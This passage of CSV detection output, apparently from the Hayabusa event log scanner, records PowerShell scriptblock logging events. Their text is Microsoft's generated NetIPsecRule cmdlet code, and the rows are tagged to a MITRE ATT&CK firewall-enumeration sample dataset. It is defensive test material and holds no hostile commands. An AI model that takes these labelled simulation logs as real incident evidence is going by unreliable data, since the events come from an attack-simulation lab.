$__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'Group",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Component', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(Par",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') 